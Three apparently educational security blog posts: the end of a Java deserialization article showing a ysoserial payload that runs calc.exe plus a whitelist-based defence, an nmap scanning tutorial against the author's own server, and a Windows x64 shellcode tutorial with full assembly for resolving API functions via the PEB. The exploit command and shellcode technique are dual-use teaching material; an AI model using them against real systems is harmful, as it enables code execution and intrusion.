Let’s do an example and completely remove the “readObject” method from our LogFile class. Since it will not do anything, we should be safe, right? However, we should also download the commons-collections-3.2.1.jar library and extract it in the class-path (the org directory).

In order to exploit this vulnerability, we can easily use ysoserial tool. The tool has a collection of exploits and it allows us to generate serialized objects that will execute commands during deserialization. We just need to specify the vulnerable library. Below is an example for Windows:

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > Exp.ser

This will generate a serialized object (Exp.ser file) for Apache Commons Collections vulnerable library and the exploit will execute the “calc.exe” command. What happens if our code will read this file and deserialize the data?

LogFile ob = new LogFile();
String file = "Exp.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

This will be the output:

Deserializing from Exp.ser
Exception in thread "main" java.lang.ClassCastException: java.management/javax.management.BadAttributeValueExpException cannot be cast to LogFile
 at LogFiles.main(LogFiles.java:105)

But this will result as well:

Calculator

We can see that an exception related to casting the deserialized object was thrown, but this happened after the deserialization process took place. So even if the application itself is safe, if there are vulnerable classes in the class-path, it is game over. Oh, it is also possible to have issues with deserialization directly in the JDK, without any 3rd party libraries.

How to prevent it?

The most common suggestion is to use a Look-Ahead ObjectInputStream. This approach makes it possible to prevent deserialization of untrusted classes by implementing a whitelist or a blacklist of classes that can be deserialized.
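A sketch of the whitelist approach is to override resolveClass, which is called for every class description found in the stream before any of that class’s readObject code can run (the SafeObjectInputStream name and the whitelist contents are mine; since Java 9, the built-in ObjectInputFilter mechanism is generally preferable):

```java
import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class SafeObjectInputStream extends ObjectInputStream
{
    // Only these classes are allowed to be deserialized
    private static final Set<String> WHITELIST =
        new HashSet<>(Arrays.asList("LogFile", "java.lang.String"));

    public SafeObjectInputStream(InputStream in) throws IOException
    {
        super(in);
    }

    // Reject any class not on the whitelist before it gets loaded
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
        throws IOException, ClassNotFoundException
    {
        if (!WHITELIST.contains(desc.getName()))
        {
            throw new InvalidClassException(desc.getName(),
                "Unauthorized deserialization attempt");
        }
        return super.resolveClass(desc);
    }
}
```

Deserializing, say, a serialized Integer through this stream throws InvalidClassException before any gadget code can execute.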

However, the only secure way to do serialization is to not do it.

Conclusion

Java deserialization vulnerabilities have become more common and more dangerous. Public exploits are available and it is easy for attackers to exploit these vulnerabilities.

It might be useful to read a bit more about this vulnerability. You can find here a lot of useful resources.

We also have to consider that Oracle plans to dump Java serialization.

However, the important thing to remember is that we should just avoid (de)serialization.


Network scanning with nmap

21 January 2019 at 06:45

Introduction

The first step in the process of penetration testing is “information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While the process differs between the different types of penetration tests, such as web application or mobile application pentests, network scanning is a crucial step in an infrastructure or network pentest.

Let’s take a simple scenario: you are a penetration tester and a company wants you to test one of its servers. They send you the IP address of the server. How do you proceed? Although nmap allows us to easily specify multiple IP targets or IP classes, to keep things simple, I will use a single target IP address which I have the permission to scan (my server): 137.74.202.89.

Why?

To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database.

How?

A well-known tool that helps penetration testers perform network scans is nmap (Network Mapper). Nmap is not just a port scanner; it is a powerful, highly customizable tool that can also find the services running on a system or even use scripts (modules) to find vulnerabilities.

The easiest way to use nmap is to use the Pentest-Tools web interface which allows anyone to easily perform a network scan.

Let’s see some examples. We want to scan an IP address using nmap. How can we do it? What parameters should we use? We can start with the easiest version:

# nmap 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 02:11 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
Not shown: 993 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open     https
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

We can find some useful information:

  • We see the nmap version and start time of the scan
  • We can see the domain name of the IP address: rstforums.com
  • We can see that the host is up, so nmap checked this
  • We can see that 993 ports are closed
  • We can see that 7 ports are open or filtered

However, even if the default scan can be very useful, it might not provide all the information we need to perform the penetration test on the remote server.

Nmap options

Checking the options of nmap is the best place to start. The “nmap -h” command will show us the command line parameters grouped in multiple categories: target specification, host discovery, scan techniques, port specification, version/service detection, OS scan, script scan, performance, firewall evasion and output. It is possible to easily find detailed information about all options by using the “man nmap” command.

Let’s see what common options might be useful, from each category.

  1. Target specification – Since we have a single IP address as a target, there is no need to load it from a file (-iL), we will specify it in the command line.
  2. Host discovery – These options are useful when there are a lot of target IP addresses and can help to reduce the scan time by checking if the target IP addresses are online. It does this by sending multiple different packets, but it can miss some of them. Since in our case there is a single target IP address, we can disable the host discovery by using the “-Pn” argument.
  3. Scan techniques – It is possible to scan using multiple techniques. First, it is important to know what to scan for: TCP, UDP or both. The most common services are running on TCP, but in a penetration test UDP ports must not be forgotten. It is possible to scan for UDP ports using “-sU” command line option and for TCP, there are two common scan techniques: SYN scan (“-sS” option) and Connect scan (“-sT” option).
  4. Port specification – After we decide what scan technique to use, we have to mention the ports we want to scan. This can be easily achieved with the “-p” option. By default, nmap scans the most common 1000 ports. However, to be sure, we can scan all ports (1-65535) using the “-p-” option.
  5. Service/version detection – Even if finding open ports is a good start, finding which service and which service version are running on the target system would help more. This can be easily achieved by using the “-sV” option.
  6. OS detection – It might be useful to also know which Operating System is running on the target system and specifying the “-O” option will instruct nmap to try to find it out.
  7. Script scan – With the previous options we can find which services are running on the target system. However, why not get more information about them? Nmap has a large number of scripts that can gather additional information about these services. Please note that some of them might be “intrusive”, so we need permission before scanning a target.
  8. Performance – This category allows us to customize the speed of the scan. There are a few timing templates that can be used with “-T” parameter, from “-T0” (paranoid mode) to “-T5” (insane mode). A recommended value would be “-T3” (normal mode) and if network connectivity is good, “-T4” (aggressive mode) can be used as well.
  9. Firewall evasion – There are multiple options which specify different techniques that can be used to avoid firewalls, however, for the simplicity we will not use them here.
  10. Output – What happens if you scan for a long time and your system crashes? What if you close the Terminal by mistake and not check the scan result? You should always save the output of the scan result! The “-oN” saves the normal output, “-oX” saves the output as XML or “-oG” saves it in “greppable” format.
  11. Other options – It is also very useful to know what is happening while a long scan is running, and “-v” can increase verbosity and keep you up to date. If there are a lot of targets, by using “--open” you will only get the open ports in the output, which can improve your scan read time. It is also possible to resume a scanning session (if the output was saved) using the “--resume” option, and “-A” (aggressive) turns on multiple scan options by default: “-O -sC -sV”, but not “-T4”.

During a penetration test all ports must be scanned. A possible nmap command to do it would be the following:

nmap -sS -sU -p- -sC -sV -O -Pn -v -oN output 137.74.202.89

However, it will take some time, so a good suggestion is to run a shorter scan first: scan, for example, only the most common 100 or 1000 TCP ports and, after this scan is finished, start the full scan while working with the result of the first one. Below is an example, where the “--top-ports” option chooses the most common 1000 ports.

nmap -sS --top-ports 1000 -sC -sV -v -Pn -oN output 137.74.202.89

TCP vs UDP scan

While doing a network scan, it is useful to understand the differences between TCP and UDP protocols.

The UDP protocol is very simple, but it does not offer the functionality that TCP does. The most useful features of TCP are the following:

  • It requires an initial connection, in 3 steps, also called the “3-way handshake”:
  1. The client sends a packet with the SYN flag (a bit in the TCP header) set
  2. The server replies with the SYN and ACK flags set (as mentioned in the TCP standard, this can also be done in two packets, but it is easier to combine them in a single packet)
  3. The client confirms with a packet that has the ACK flag set
  • Each packet sent to a target is confirmed by another packet, so it is possible to know if the packet reached the destination or not
  • Each packet has a number, so it is sure that the packets are processed at the destination in the same order as they were sent

The initial connection is important to understand in order to see the difference between the two common TCP scans: SYN scan (-sS) vs Connect scan (-sT). The difference is that the SYN scan is faster, as nmap will not send the last ACK packet. Also, it is important to note that nmap requires root privileges to use the SYN scan. This is because nmap needs to use raw sockets, a functionality of the operating system, to be able to manually create the TCP packets, and this requires root privileges. If we run nmap with root privileges, by default it will use the SYN scan; if not, it will use the Connect scan.
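A Connect scan relies on nothing more than the operating system’s normal connect() call, which performs the full three-way handshake. Below is a minimal sketch of the idea (the ConnectScan name is mine):

```java
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Socket;

public class ConnectScan
{
    // A port is reported open if a full TCP three-way handshake
    // succeeds; any error (RST, timeout) counts as closed/filtered
    public static boolean isOpen(String host, int port, int timeoutMs)
    {
        try (Socket s = new Socket())
        {
            s.connect(new InetSocketAddress(host, port), timeoutMs);
            return true;
        }
        catch (IOException e)
        {
            return false;
        }
    }

    public static void main(String[] args)
    {
        System.out.println(isOpen("127.0.0.1", 80, 500)
            ? "80/tcp open" : "80/tcp closed/filtered");
    }
}
```

This is also why a Connect scan does not need root privileges: the kernel builds the packets, at the price of completing (and thus possibly logging) the connection.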

How does it work?

Enough with the theory, let’s see what happens during a SYN and UDP scan. We will use a simple command, to scan for port 80 on both TCP (using SYN scan) and UDP.

# nmap -sS -sU -Pn -p 80 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 13:12 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE  SERVICE
80/tcp open   http
80/udp closed http
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

During the scan, we open Wireshark and check for the packets sent using a filter that will show us only the packets sent to our target IP address: “ip.addr == 137.74.202.89”. Below is the result:

syn

We can see the following:

  1. The first three packets are TCP: one with the SYN flag sent by nmap, one with the SYN and ACK flags sent by the target server, and one with the RST (Reset) flag sent by nmap. As you can see, being a SYN scan, the last packet of the three-way handshake is never sent. This is helpful because some services might log the IP address that connected to them, and this type of scan helps us avoid that.
  2. The last two packets are UDP and ICMP: the first is the packet sent by nmap to the remote port 80, and the reply is an ICMP “Destination unreachable (Port unreachable)” message, which tells us that the port is not open, so nmap can show it as closed. However, please note that the ICMP reply might not be sent at all (e.g. it can be filtered or rate-limited), in which case nmap reports the UDP port as open|filtered.

Let’s also check how a Connect scan is performed. We can use the following command:

nmap -sT -Pn -p 80 137.74.202.89

Below is the result:

open

We can see that there are four packets:

  1. First three packets represent the three-way handshake used to initiate the connection.
  2. Last packet is sent to close the connection

What happens if the port is closed? We will change the port to a random one: 1337

closed

There are two packets:

  1. First packet is the SYN packet sent by nmap to initiate the connection
  2. The second packet is the RST packet received, meaning that the port is not open

However, if a firewall is used, it might be possible to not receive the RST packet.

Service version

Service version option (-sV) allows us to find out what is running on the target port. This depends on the service running there. However, let’s see some examples of requests that nmap will use to find what is running on port 80, which is an Apache web server.

# nmap -sS -Pn -p 80 -sV 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:05 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.043s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.98 seconds

Below is a list of HTTP requests sent by nmap:

GET / HTTP/1.0
GET /nmaplowercheck1539799522 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
POST /sdk HTTP/1.1
Host: rstforums.com
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
GET /HNAP1 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
GET / HTTP/1.1
Host: rstforums.com
GET /evox/about HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

Script scan

If we enable the script scan (-sC), the number of requests increases as it will use multiple “scripts” to find more information about the target. Let’s take the following example:

# nmap -sS -Pn -p 80 -sC 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:14 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://rstforums.com/
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

Below is the Wireshark output, using a filter that matches only the HTTP requests sent:

http wireshark

As you can see, nmap scripts will send several HTTP requests useful to find more information about the application running on the web server. For example, it will send a request to find if the “.git” directory is present, which can contain source code, it sends a request to get the “robots.txt” file which might lead to additional paths, and one script even sends a POST request to find if there is an RPC (Remote Procedure Call) aware service running:

POST / HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Host: rstforums.com

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Conclusion

Nmap is most often seen as a “port scanner”. However, in the hands of someone who properly understands how it works, it turns into a powerful penetration testing tool.

This article highlights some of the most common and useful features of nmap, but for a comprehensive understanding of the tool you need to read the manual and actually use it.


Writing shellcodes for Windows x64

30 June 2019 at 16:01

A long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. The first part explains what a shellcode is and what its limitations are, the second part explains the PEB (Process Environment Block), the PE (Portable Executable) file format and the basics of ASM (assembly), and the third part shows how a Windows shellcode can actually be implemented.

This blog post ports the previous articles to Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so anyone who is not familiar with all the concepts of shellcode development on Windows should read them before going further.

Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already wrote some details about Windows 64 bits in the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here.

As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using the SwapMouseButton function exported by user32.dll and gracefully closes the process using the ExitProcess function exported by kernel32.dll.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

Please note that this article is for educational purposes only. It has to be simple, meaning that, of course, there are a lot of optimizations that can be done for the resulted shellcode to be smaller and faster.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bits (8 bytes) instead of 32 bits (4 bytes).
  • EAX, EBX, ECX, EDX, ESI, EDI, EBP and ESP represent the lower 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8D, R9D etc. in order to access the lower 4 bytes, just as you can with EAX, EBX etc.
  • Pushing and popping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • The first 4 parameters are not placed on the stack; they are passed in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the remaining parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments passed in registers (called “shadow space” or “home space”). Even though the parameters are placed in registers when a function is called, if the called function needs to modify those registers, it will need some space to store the values, and this space is the stack. The function caller has to allocate this space before the function call and deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16-byte aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
  • Some registers are volatile and others are nonvolatile. This means that if we set some values in a register and call some function (e.g. a Windows API), the volatile registers will probably change, while the nonvolatile registers will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after disabling all optimizations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This places the second parameter in the EDX register. Since the number is small, there is no need to use RDX; the result is the same.
  3. mov ecx,3 – The value of the first argument is placed in the ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs to use those registers (note, however, that some registers must be preserved across a function call: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves the second argument (the value 4) from the EDX register into the shadow space.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one saves the first argument (the value 3) from the ECX register on the stack.
  3. sub rsp,18 – Allocate 0x18 (24) bytes on the stack. This function does not call any other function, so it does not need to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes; it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like side effects of the disabled optimizations; they do not do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function

Writing ASM on Windows x64

There are multiple ways to write assembler on Windows x64. I will use NASM and the linker provided by Microsoft Visual Studio Community.

I will use the x64.asm file to write the assembly code, NASM will output x64.obj and the linker will create x64.exe. To keep this process simple, I created a simple Windows Batch script:

del x64.obj
del x64.exe
nasm -f win64 x64.asm -o x64.obj
link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE x64.obj

You can run it using “x64 Native Tools Command Prompt for VS 2019”, where “link” is available directly. Just don’t forget to add the NASM binaries directory to the PATH environment variable.

To test the shellcode, I open the resulting binary in x64dbg and go through the code step by step. This way, we can be sure everything is OK.

Before starting with the actual shellcode, we can start with the following:

BITS 64
SECTION .text
global main
main:

sub   RSP, 0x28                 ; 40 bytes of shadow space
and   RSP, 0FFFFFFFFFFFFFFF0h   ; Align the stack to a multiple of 16 bytes

This specifies 64-bit code, with a “main” function in the “.text” (code) section. The code also allocates some stack space and aligns the stack to a multiple of 16 bytes.

Find kernel32.dll base address

As we know, the first step in the shellcode development process for Windows is to find the base address of kernel32.dll, the memory address where it is loaded. This will help us find its useful exported functions, GetProcAddress and LoadLibraryA, which we can use to achieve our goals.

We will start by finding the TEB (Thread Environment Block), the structure that contains thread information in user mode; we can find it using the GS register, at gs:[0x00]. This structure also contains a pointer to the PEB (Process Environment Block) at offset 0x60.

The PEB contains the “Loader” (Ldr) at offset 0x18, which contains the “InMemoryOrder” list of modules at offset 0x20. As on x86, the first module will be the executable, the second one ntdll.dll and the third one kernel32.dll, which is the one we want to find. This means we will go through a linked list (the LIST_ENTRY structure, which contains two LIST_ENTRY* pointers, Flink and Blink, 8 bytes each on x64).

After we find the third module, kernel32.dll, we just need to go to offset 0x20 to get its base address and we can start doing our stuff.

Below is how we can get the base address of kernel32.dll using PEB and store it in the RBX register:

; Parse PEB and find kernel32

xor rcx, rcx             ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18]    ; RAX = PEB->Ldr
mov rsi, [rax + 0x20]    ; RSI = PEB->Ldr.InMemOrder
lodsq                    ; RAX = Second module
xchg rax, rsi            ; RAX = RSI, RSI = RAX
lodsq                    ; RAX = Third(kernel32)
mov rbx, [rax + 0x20]    ; RBX = Base address
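The walk above can be sketched in a few lines of Python. This is only a toy model, not real Windows memory: it emulates the pointer chain in a flat buffer, with made-up addresses and a made-up base value, to show that three dereferences with the same offsets land on the third module’s base address.

```python
import struct

# Toy model: a flat buffer stands in for process memory.
mem = bytearray(0x1000)

def write_ptr(addr, value):
    struct.pack_into("<Q", mem, addr, value)  # little-endian 8-byte pointer

def read_ptr(addr):
    return struct.unpack_from("<Q", mem, addr)[0]

# All of these values are invented for the demo.
PEB, LDR = 0x100, 0x200
EXE, NTDLL, KERNEL32 = 0x300, 0x400, 0x500
KERNEL32_BASE = 0x7FF812340000

write_ptr(PEB + 0x18, LDR)                 # PEB->Ldr
write_ptr(LDR + 0x20, EXE)                 # Ldr.InMemoryOrder -> 1st module (exe)
write_ptr(EXE, NTDLL)                      # Flink -> 2nd module (ntdll.dll)
write_ptr(NTDLL, KERNEL32)                 # Flink -> 3rd module (kernel32.dll)
write_ptr(KERNEL32 + 0x20, KERNEL32_BASE)  # DllBase, 0x20 past the list links

# The same dereferences the shellcode does with its two lodsq instructions:
ldr = read_ptr(PEB + 0x18)
first = read_ptr(ldr + 0x20)   # first module (the executable)
second = read_ptr(first)       # second module (ntdll.dll)
third = read_ptr(second)       # third module (kernel32.dll)
base = read_ptr(third + 0x20)  # its base address
print(hex(base))               # 0x7ff812340000
```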

Find the address of GetProcAddress function

Finding the address of the GetProcAddress function is really similar to the x86 case; the only difference is the offset of the export table, which is 0x88 instead of 0x78.

The steps are the same:

  1. Go to the PE header (offset 0x3c)
  2. Go to Export table (offset 0x88)
  3. Go to the names table (offset 0x20)
  4. Get the function name
  5. Check if it starts with “GetProcA”
  6. Go to the ordinals table (offset 0x24)
  7. Get function number
  8. Go to the address table (offset 0x1c)
  9. Get the function address

Below is the code that can help us find the address of GetProcAddress:

; Parse kernel32 PE

xor r8, r8                 ; Clear r8
mov r8d, [rbx + 0x3c]      ; R8D = DOS->e_lfanew offset
mov rdx, r8                ; RDX = DOS->e_lfanew
add rdx, rbx               ; RDX = PE Header
mov r8d, [rdx + 0x88]      ; R8D = Offset export table
add r8, rbx                ; R8 = Export table
xor rsi, rsi               ; Clear RSI
mov esi, [r8 + 0x20]       ; RSI = Offset namestable
add rsi, rbx               ; RSI = Names table
xor rcx, rcx               ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA

; Loop through exported functions and find GetProcAddress

Get_Function:

inc rcx                    ; Increment the ordinal
xor rax, rax               ; RAX = 0
mov eax, [rsi + rcx * 4]   ; Get name offset
add rax, rbx               ; Get function name
cmp QWORD [rax], r9        ; GetProcA ?
jnz Get_Function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x24]       ; ESI = Offset ordinals
add rsi, rbx               ; RSI = Ordinals table
mov cx, [rsi + rcx * 2]    ; Number of function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x1c]       ; Offset address table
add rsi, rbx               ; ESI = Address table
xor rdx, rdx               ; RDX = 0
mov edx, [rsi + rcx * 4]   ; EDX = Pointer(offset)
add rdx, rbx               ; RDX = GetProcAddress
mov rdi, rdx               ; Save GetProcAddress in RDI

Please note that this has to be done carefully. Some fields of the PE file are not 8 bytes wide, while in the end we need 8-byte pointers. This is why registers such as ESI or CX are used in the code above.
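The 8-byte constants used in the code, such as 0x41636f7250746547 for “GetProcA”, are simply ASCII strings interpreted as little-endian integers. A small Python helper (just a convenience for generating such constants, not part of the shellcode) shows the encoding:

```python
def str_to_qword(s):
    """Encode up to 8 ASCII characters as a little-endian integer,
    suitable for a `mov reg, imm` in the shellcode."""
    if len(s) > 8:
        raise ValueError("a qword holds at most 8 characters")
    return int.from_bytes(s.encode("ascii"), "little")

print(hex(str_to_qword("GetProcA")))  # 0x41636f7250746547, as used above
print(hex(str_to_qword("LoadLibr")))  # 0x7262694c64616f4c
print(hex(str_to_qword("aryA")))      # 0x41797261
```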

Find the address of LoadLibraryA

Since we have the address of GetProcAddress and the base address of kernel32.dll, we can use them to call GetProcAddress(kernel32.dll, “LoadLibraryA”) and find the address of the LoadLibraryA function.

However, there is something important we need to be careful about: we will use the stack to place our strings (e.g. “LoadLibraryA”) and this might break the stack alignment, so we need to make sure it is 16-byte aligned. Also, we must not forget about the stack space that we need to allocate for a function call, because the function we call might use it. So we need to place our string on the stack and only after that allocate space for the function we call (e.g. GetProcAddress).

Finding the address of LoadLibraryA is pretty straightforward:

; Use GetProcAddress to find the address of LoadLibrary

mov rcx, 0x41797261          ; aryA
push rcx                     ; Push on the stack
mov rcx, 0x7262694c64616f4c  ; LoadLibr
push rcx                     ; Push on stack
mov rdx, rsp                 ; LoadLibraryA
mov rcx, rbx                 ; kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for LoadLibrary string
mov rsi, rax                 ; LoadLibrary saved in RSI

We put the “LoadLibraryA” string on the stack, set up the RCX and RDX registers, allocate space on the stack for the function call, call GetProcAddress and clean up the stack. As a result, the LoadLibraryA address is stored in the RSI register.

Load user32.dll using LoadLibraryA

Since we have the address of the LoadLibraryA function, it is pretty simple to call LoadLibraryA(“user32.dll”) to load user32.dll and find its base address, which will be returned by LoadLibraryA.

mov rcx, 0x6c6c               ; ll
push rcx                      ; Push on the stack
mov rcx, 0x642e323372657375   ; user32.d
push rcx                      ; Push on stack
mov rcx, rsp                  ; user32.dll
sub rsp, 0x30                 ; Allocate stack space for function call
call rsi                      ; Call LoadLibraryA
add rsp, 0x30                 ; Cleanup allocated stack space
add rsp, 0x10                 ; Clean space for user32.dll string
mov r15, rax                  ; Base address of user32.dll in R15

The function will return the base address of the user32.dll module into RAX and we will save it in the R15 register.

Find the address of SwapMouseButton function

We have the address of GetProcAddress, the base address of user32.dll and we know the function is called “SwapMouseButton”. So we just need to call GetProcAddress(user32.dll, “SwapMouseButton”).

Please note that when we allocate space on the stack for the function call, we no longer allocate 0x30 (48) bytes, but only 0x28 (40) bytes. This is because placing our string (“SwapMouseButton”) on the stack takes 3 PUSH instructions, so we push 0x18 (24) bytes of data, which is not a multiple of 16. So we use 0x28 instead of 0x30 to keep the stack aligned to 16 bytes.

; Call GetProcAddress(user32.dll, "SwapMouseButton")

xor rcx, rcx                  ; RCX = 0
push rcx                      ; Push 0 on stack
mov rcx, 0x6e6f7474754265     ; eButton
push rcx                      ; Push on the stack
mov rcx, 0x73756f4d70617753   ; SwapMous
push rcx                      ; Push on stack
mov rdx, rsp                  ; SwapMouseButton
mov rcx, r15                  ; User32.dll base address
sub rsp, 0x28                 ; Allocate stack space for function call
call rdi                      ; Call GetProcAddress
add rsp, 0x28                 ; Cleanup allocated stack space
add rsp, 0x18                 ; Clean space for SwapMouseButton string
mov r15, rax                  ; SwapMouseButton in R15

GetProcAddress will return in RAX the address of SwapMouseButton function and we will save it into R15 register.
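The alignment bookkeeping can be sanity-checked with a few lines of arithmetic. This is just a sketch; the starting RSP value is made up, only its alignment matters:

```python
# Verify the 16-byte alignment bookkeeping around the two GetProcAddress
# calls above. The starting RSP value is invented for the demo.
rsp = 0x14FF40
assert rsp % 16 == 0  # assume the stack is aligned at this point

# GetProcAddress(kernel32, "LoadLibraryA"): 2 pushes + sub rsp, 0x30
assert (rsp - 2 * 8 - 0x30) % 16 == 0

# GetProcAddress(user32, "SwapMouseButton"): 3 pushes + sub rsp, 0x28
assert (rsp - 3 * 8 - 0x28) % 16 == 0

print("alignment checks passed")
```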

Call SwapMouseButton

Well, we have its address, so it should be pretty easy to call it. We do not have any alignment issue, as we previously cleaned up, and we do not need to alter the stack for this function call. So we just set the RCX register to 1 (meaning true) and call it.

; Call SwapMouseButton(true)

mov rcx, 1    ; true
call r15      ; SwapMouseButton(true)

Find the address of ExitProcess function

As we did before, we use GetProcAddress to find the address of the ExitProcess function exported by kernel32.dll. We still have the kernel32.dll base address in RBX (a nonvolatile register, which is why it was used), so it is simple:

; Call GetProcAddress(kernel32.dll, "ExitProcess")

xor rcx, rcx                 ; RCX = 0
mov rcx, 0x737365            ; ess
push rcx                     ; Push on the stack
mov rcx, 0x636f725074697845  ; ExitProc
push rcx                     ; Push on stack
mov rdx, rsp                 ; ExitProcess
mov rcx, rbx                 ; Kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for ExitProcess string
mov r15, rax                 ; ExitProcess in R15

We save the address of ExitProcess function in R15 register.

ExitProcess

Since we do not want to let the process crash, we can “gracefully” exit by calling the ExitProcess function. We have the address and the stack is aligned; we just have to call it.

; Call ExitProcess(0)

mov rcx, 0     ; Exit code 0
call r15       ; ExitProcess(0)

Conclusion

There are many articles about Windows shellcode development on x64, such as this one or this one, but I just wanted to tell the story my way, following the previously written articles.

